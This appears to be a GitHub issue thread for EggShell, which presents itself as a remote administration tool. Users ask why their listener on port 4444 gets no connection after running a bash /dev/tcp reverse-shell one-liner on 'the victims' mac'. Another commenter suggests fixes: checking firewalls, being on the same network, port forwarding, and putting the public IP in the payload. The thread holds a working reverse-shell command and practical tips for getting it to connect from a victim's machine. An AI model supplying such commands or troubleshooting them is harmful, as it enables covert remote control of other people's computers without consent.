lucasjacks0n / EggShell

iOS/macOS/Linux Remote Administration Tool
GNU General Public License v2.0
1.66k stars 382 forks source link

My console stuck in Listening on port 4444... #91

Open mikk146m opened 6 years ago

mikk146m commented 6 years ago

Can anybody help me? My console is stuck in my console stuck in "Listening on port 4444...", I have entered the "bash &> /dev/tcp/"my IP"/4444 0>&1" on the victims' mac? Thanks in advanced :-)

DeDogeGod commented 6 years ago

I have the same problem because my victim's mac refuses to connect and says operation times out.

hammi1 commented 5 years ago

There may be a firewall in place blocking the connection. You also need to be on the same network (so the local IP address routes correctly) or have your server port forwarded and the payload contain your public IP. If its on the same network, check there is nothing blocking it by testing it with something like netcat.